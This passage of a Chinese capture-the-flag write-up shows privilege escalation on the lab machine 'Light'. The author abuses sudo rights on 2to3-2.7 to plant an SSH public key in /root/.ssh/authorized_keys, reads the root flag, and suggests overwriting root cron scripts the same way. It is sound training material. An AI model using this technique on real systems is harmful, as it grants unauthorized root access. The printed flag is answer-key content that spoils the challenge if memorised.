*,                          ,*                          \n                           *                      **                            \n                             *,                .*                               \n                                *.           **                                 \n                                  **      ,*,                                   \n                                     ** *,     \\033[0m&#039;                                               \n\necho &quot;-------------------------&quot;\necho &quot;\\nPWNED HOST: $(hostname)&quot;\necho &quot;\\nPWNED DATE: $(date)&quot;\necho &quot;\\nWHOAMI: $(id)&quot;\necho &quot;\\nFLAG: $(cat root.txt 2&gt;\/dev\/null || cat user.txt 2&gt;\/dev\/null || echo &quot;Keep trying.&quot;)&quot;\necho &quot;\\n------------------------&quot;\n\nlover@light:~$ cat tip.py \n#!\/usr\/bin\/env python3\nimport socket\nfrom random import randint\n\nHOST = &#039;0.0.0.0&#039;                 # Symbolic name meaning all available interfaces\nwhile True:\n        allow_reuse_address = True\n        random = randint(8000,65000)\n        PORT = random              # Arbitrary non-privileged port\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n        s.bind((HOST, PORT))\n        s.listen(1)\n        conn, addr = s.accept()\n        print (&quot;Connected by&quot;,addr)\n        with open(&#039;mypass.txt&#039;, &#039;r&#039;) as f:\n                conn.sendall(f.read().encode(&#039;utf-8&#039;))\n        conn.close()\n\nlover@light:~$ cat mypass.txt \n00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452  .PNG........IHDR\n00000010: 0000 013f 0000 0085 0806 0000 002d 80ff  ...?.........-..\n00000020: 0c00 0000 0173 5247 4200 aece 1ce9 0000  .....sRGB.......\n00000030: 0004 6741 4d41 0000 b18f 0bfc 6105 0000  ..gAMA......a...\n00000040: 0009 7048 5973 0000 0ec3 0000 0ec3 01c7  ..pHYs..........\n00000050: 6fa8 6400 0007 de49 4441 5478 5eed dbf7  o.d....IDATx^...\n00000060: 9314 4518 c671 ffff 1f2d ab2c 73c0 9cb0  ..E..q...-.,s...\n----------------\n\nlover@light:~$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Is a directory\nlover@light:~$ crontab -l\n# Edit this file to introduce tasks to be run by cron.\n# \n# Each task to run has to be defined through a single line\n# indicating with different fields when the task will be run\n# and what command to run for the task\n# \n# To define the time you can provide concrete values for\n# minute (m), hour (h), day of month (dom), month (mon),\n# and day of week (dow) or use &#039;*&#039; in these fields (for &#039;any&#039;).\n# \n# Notice that tasks will be started based on the cron&#039;s system\n# daemon&#039;s notion of time and timezones.\n# \n# Output of the crontab jobs (including errors) is sent through\n# email to the user the crontab file belongs to (unless redirected).\n# \n# For example, you can run a backup of all your user accounts\n# at 5 a.m every week with:\n# 0 5 * * 1 tar -zcf \/var\/backups\/home.tgz \/home\/\n# \n# For more information see the manual pages of crontab(5) and cron(8)\n# \n# m h  dom mon dow   command\n@reboot python \/home\/lover\/tip.py<\/code><\/pre>\n<h3>\u8986\u5199\u516c\u94a5<\/h3>\n<p>\u4f3c\u4e4e\u662f\u4e00\u4e2a\u5c06 python2 \u7a0b\u5e8f\u8f6c\u6362\u6210 python3 \u7a0b\u5e8f\u7684\u5e93\uff0c\u62e5\u6709\u5199\u5165\u6743\u9650\uff0c\u5c1d\u8bd5\u5199\u5165\u66ff\u6362\u516c\u94a5\uff1a<\/p>\n<pre><code class=\"language-python\">text = &#039;&#039;&#039;\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCX4CxFTzX3\/H4eZNPPElW0lQUQaQkaM+CPykvpX1WA6DKHCxaFCkN22uR\/+o0COklnUr0DcJjfOwJa+FdG4XD2sbZ7HLlf5\/5QCapABB5ImRKm3S8nnkB5N08DFiflK4ua9KRnRFb1+M9rgbXLyGu0RErtCla6cY2hpe9ue+Iwj4FrT1gtnLfhVTTWYK6X+q4p\/UIRTukE1465+d7MacxEPpmvh9S12b\/mmL50LmrRLNSGC94KoqpMFmh4S04AxjdicMUJvnw6GSeORztY1MErdlUm4ZbAleFFQlZqVod+dTNe7jXpHZTw9S42koS2Ydso+XcXI48\/T\/7N796aw8PVrveOzB8Yj92iJa\/N1dmvnWBPuZnrqTDNAsUbcRhU48fF+v0HvOseXGVuYxpu1C+kCOcy6P9xPDL7MnJ8TM0yPEW8M1rFt6bMZuPkVadYJHWhRBz1ThZBonjG7OOcE\/\/P426gFbjRe66qFw2eKJeg2Qihtx89UgZNDRWOtDC20VM= kali@kali   \n&#039;&#039;&#039;\nprint text<\/code><\/pre>\n<p>\u7136\u540e\u5c1d\u8bd5\u5f3a\u884c\u5199\u5165\uff1a<\/p>\n<pre><code class=\"language-bash\">lover@light:\/tmp$ sudo \/usr\/bin\/2to3-2.7 -w -n authorized_keys -o \/root\/.ssh\/authorized_keys\nlib2to3.main: Output in &#039;\/root\/.ssh\/authorized_keys&#039; will mirror the input directory &#039;&#039; layout.\nRefactoringTool: Skipping optional fixer: buffer\nRefactoringTool: Skipping optional fixer: idioms\nRefactoringTool: Skipping optional fixer: set_literal\nRefactoringTool: Skipping optional fixer: ws_comma\nRefactoringTool: Refactored authorized_keys\n--- authorized_keys     (original)\n+++ authorized_keys     (refactored)\n@@ -1,4 +1,4 @@\n text = &#039;&#039;&#039;\n ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCX4CxFTzX3\/H4eZNPPElW0lQUQaQkaM+CPykvpX1WA6DKHCxaFCkN22uR\/+o0COklnUr0DcJjfOwJa+FdG4XD2sbZ7HLlf5\/5QCapABB5ImRKm3S8nnkB5N08DFiflK4ua9KRnRFb1+M9rgbXLyGu0RErtCla6cY2hpe9ue+Iwj4FrT1gtnLfhVTTWYK6X+q4p\/UIRTukE1465+d7MacxEPpmvh9S12b\/mmL50LmrRLNSGC94KoqpMFmh4S04AxjdicMUJvnw6GSeORztY1MErdlUm4ZbAleFFQlZqVod+dTNe7jXpHZTw9S42koS2Ydso+XcXI48\/T\/7N796aw8PVrveOzB8Yj92iJa\/N1dmvnWBPuZnrqTDNAsUbcRhU48fF+v0HvOseXGVuYxpu1C+kCOcy6P9xPDL7MnJ8TM0yPEW8M1rFt6bMZuPkVadYJHWhRBz1ThZBonjG7OOcE\/\/P426gFbjRe66qFw2eKJeg2Qihtx89UgZNDRWOtDC20VM= kali@kali   \n &#039;&#039;&#039;\n-print text\n+print(text)\nRefactoringTool: Writing converted authorized_keys to \/root\/.ssh\/authorized_keys\/authorized_keys.\nRefactoringTool: Files that were modified:\nRefactoringTool: authorized_keys<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fde\u63a5\u4e00\u4e0b\uff0c\u4f46\u662f\u5931\u8d25\u4e86\u3002\u3002\u3002\u3002\u662f\u6211\u4f7f\u7528\u65b9\u6cd5\u6709\u95ee\u9898\uff0c\u5b83\u662f\u5199\u5165\u4e86\u4e00\u4e2a\u540d\u4e3a<code>authorized_keys<\/code>\u76ee\u5f55\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">lover@light:\/tmp$ sudo \/usr\/bin\/2to3-2.7 -w -n authorized_keys -o \/root\/.ssh\/\nlib2to3.main: Output in &#039;\/root\/.ssh\/&#039; will mirror the input directory &#039;&#039; layout.\nRefactoringTool: Skipping optional fixer: buffer\nRefactoringTool: Skipping optional fixer: idioms\nRefactoringTool: Skipping optional fixer: set_literal\nRefactoringTool: Skipping optional fixer: ws_comma\nRefactoringTool: Refactored authorized_keys\n--- authorized_keys     (original)\n+++ authorized_keys     (refactored)\n@@ -1,4 +1,4 @@\n text = &#039;&#039;&#039;\n ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCX4CxFTzX3\/H4eZNPPElW0lQUQaQkaM+CPykvpX1WA6DKHCxaFCkN22uR\/+o0COklnUr0DcJjfOwJa+FdG4XD2sbZ7HLlf5\/5QCapABB5ImRKm3S8nnkB5N08DFiflK4ua9KRnRFb1+M9rgbXLyGu0RErtCla6cY2hpe9ue+Iwj4FrT1gtnLfhVTTWYK6X+q4p\/UIRTukE1465+d7MacxEPpmvh9S12b\/mmL50LmrRLNSGC94KoqpMFmh4S04AxjdicMUJvnw6GSeORztY1MErdlUm4ZbAleFFQlZqVod+dTNe7jXpHZTw9S42koS2Ydso+XcXI48\/T\/7N796aw8PVrveOzB8Yj92iJa\/N1dmvnWBPuZnrqTDNAsUbcRhU48fF+v0HvOseXGVuYxpu1C+kCOcy6P9xPDL7MnJ8TM0yPEW8M1rFt6bMZuPkVadYJHWhRBz1ThZBonjG7OOcE\/\/P426gFbjRe66qFw2eKJeg2Qihtx89UgZNDRWOtDC20VM= kali@kali   \n &#039;&#039;&#039;\n-print text\n+print(text)\nRefactoringTool: Writing converted authorized_keys to \/root\/.ssh\/authorized_keys.\nTraceback (most recent call last):\n  File &quot;\/usr\/bin\/2to3-2.7&quot;, line 5, in &lt;module&gt;\n    sys.exit(main(&quot;lib2to3.fixes&quot;))\n  File &quot;\/usr\/lib\/python2.7\/lib2to3\/main.py&quot;, line 260, in main\n    options.processes)\n  File &quot;\/usr\/lib\/python2.7\/lib2to3\/refactor.py&quot;, line 706, in refactor\n    items, write, doctests_only)\n  File &quot;\/usr\/lib\/python2.7\/lib2to3\/refactor.py&quot;, line 301, in refactor\n    self.refactor_file(dir_or_file, write, doctests_only)\n  File &quot;\/usr\/lib\/python2.7\/lib2to3\/refactor.py&quot;, line 747, in refactor_file\n    *args, **kwargs)\n  File &quot;\/usr\/lib\/python2.7\/lib2to3\/refactor.py&quot;, line 358, in refactor_file\n    write=write, encoding=encoding)\n  File &quot;\/usr\/lib\/python2.7\/lib2to3\/refactor.py&quot;, line 524, in processed_file\n    self.write_file(new_text, filename, old_text, encoding)\n  File &quot;\/usr\/lib\/python2.7\/lib2to3\/main.py&quot;, line 101, in write_file\n    write(new_text, filename, old_text, encoding)\n  File &quot;\/usr\/lib\/python2.7\/lib2to3\/refactor.py&quot;, line 536, in write_file\n    f = _open_with_encoding(filename, &quot;w&quot;, encoding=encoding)\n  File &quot;\/usr\/lib\/python2.7\/codecs.py&quot;, line 898, in open\n    file = __builtin__.open(filename, mode, buffering)\nIOError: [Errno 21] Is a directory: &#039;\/root\/.ssh\/authorized_keys&#039;<\/code><\/pre>\n<p>\u554a\u554a\u554a\u554a\uff0c\u5e94\u8be5\u4ed4\u7ec6\u770b\u7684\uff0c\u91cd\u7f6e\u9776\u673a\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">lover@light:\/tmp$ nano authorized_keys\nlover@light:\/tmp$ sudo \/usr\/bin\/2to3-2.7 -w -n authorized_keys -o \/root\/.ssh\/\nlib2to3.main: Output in &#039;\/root\/.ssh\/&#039; will mirror the input directory &#039;&#039; layout.\nRefactoringTool: Skipping optional fixer: buffer\nRefactoringTool: Skipping optional fixer: idioms\nRefactoringTool: Skipping optional fixer: set_literal\nRefactoringTool: Skipping optional fixer: ws_comma\nRefactoringTool: Refactored authorized_keys\n--- authorized_keys     (original)\n+++ authorized_keys     (refactored)\n@@ -1,4 +1,4 @@\n text = &#039;&#039;&#039;\n ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCX4CxFTzX3\/H4eZNPPElW0lQUQaQkaM+CPykvpX1WA6DKHCxaFCkN22uR\/+o0COklnUr0DcJjfOwJa+FdG4XD2sbZ7HLlf5\/5QCapABB5ImRKm3S8nnkB5N08DFiflK4ua9KRnRFb1+M9rgbXLyGu0RErtCla6cY2hpe9ue+Iwj4FrT1gtnLfhVTTWYK6X+q4p\/UIRTukE1465+d7MacxEPpmvh9S12b\/mmL50LmrRLNSGC94KoqpMFmh4S04AxjdicMUJvnw6GSeORztY1MErdlUm4ZbAleFFQlZqVod+dTNe7jXpHZTw9S42koS2Ydso+XcXI48\/T\/7N796aw8PVrveOzB8Yj92iJa\/N1dmvnWBPuZnrqTDNAsUbcRhU48fF+v0HvOseXGVuYxpu1C+kCOcy6P9xPDL7MnJ8TM0yPEW8M1rFt6bMZuPkVadYJHWhRBz1ThZBonjG7OOcE\/\/P426gFbjRe66qFw2eKJeg2Qihtx89UgZNDRWOtDC20VM= kali@kali   \n &#039;&#039;&#039;\n-print text\n+print(text)\nRefactoringTool: Writing converted authorized_keys to \/root\/.ssh\/authorized_keys.\nRefactoringTool: Files that were modified:\nRefactoringTool: authorized_keys<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506271505454.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506271505454.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250627150147953\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u540c\u7406\u53ef\u4ee5\u8986\u5199\u9ad8\u6743\u9650\u5b9a\u65f6\u4efb\u52a1\uff08\u8fd0\u884c pspy64 \u53ef\u4ee5\u770b\u5230\u6709\u4e00\u4e2a root \u8fd0\u884c\u7684 python \u5b9a\u65f6\u4efb\u52a1\uff09\uff0c\u8986\u5199\u7b2c\u4e09\u65b9\u5e93\u7684 main \u51fd\u6570\u7b49\u7b49\u90fd\u884c\u3002<\/p>\n<pre><code class=\"language-bash\">root@light:~# ls -la\ntotal 40\ndrwx------  5 root root 4096 Jun 27 03:01 .\ndrwxr-xr-x 18 root root 4096 Nov 13  2020 ..\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\n-rwxr-xr-x  1 root root 1921 Nov 13  2020 flag.sh\ndrwxr-xr-x  3 root root 4096 Nov 13  2020 .local\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rw-------  1 root root   12 Nov 13  2020 root.txt\ndrwxr-xr-x  2 root root 4096 Nov 13  2020 script\n-rw-r--r--  1 root root   66 Nov 13  2020 .selected_editor\ndrwxr-xr-x  2 root root 4096 Jun 27 03:01 .ssh\nroot@light:~# cat flag.sh \n#!\/bin\/bash\necho &#039;\\033[0;35m\n                                   .     **                                     \n                                *           *.                                  \n                                              ,*                                \n                                                 *,                             \n                         ,                         ,*                           \n                      .,                              *,                        \n                    \/                                    *                      \n                 ,*                                        *,                   \n               \/.                                            .*.                \n             *                                                  **              \n             ,*                                               ,*                \n                **                                          *.                  \n                   **                                    **.                    \n                     ,*                                **                       \n                        *,                          ,*                          \n                           *                      **                            \n                             *,                .*                               \n                                *.           **                                 \n                                  **      ,*,                                   \n                                     ** *,     \\033[0m&#039;                                               \n\necho &quot;-------------------------&quot;\necho &quot;\\nPWNED HOST: $(hostname)&quot;\necho &quot;\\nPWNED DATE: $(date)&quot;\necho &quot;\\nWHOAMI: $(id)&quot;\necho &quot;\\nFLAG: $(cat root.txt 2&gt;\/dev\/null || cat user.txt 2&gt;\/dev\/null || echo &quot;Keep trying.&quot;)&quot;\necho &quot;\\n------------------------&quot;\n\nroot@light:~# cat root.txt \nilovepython\nroot@light:~# cd script\/\nroot@light:~\/script# ls -la\ntotal 12\ndrwxr-xr-x 2 root root 4096 Nov 13  2020 .\ndrwx------ 5 root root 4096 Jun 27 03:01 ..\n-rw-r--r-- 1 root root   21 Nov 13  2020 light.py\nroot@light:~\/script# cat light.py \nprint &quot;NOT FINISHED&quot;<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Light \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Light] \u2514\u2500$ rusts [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-917","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/917","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=917"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/917\/revisions"}],"predecessor-version":[{"id":918,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/917\/revisions\/918"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=917"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=917"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=917"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}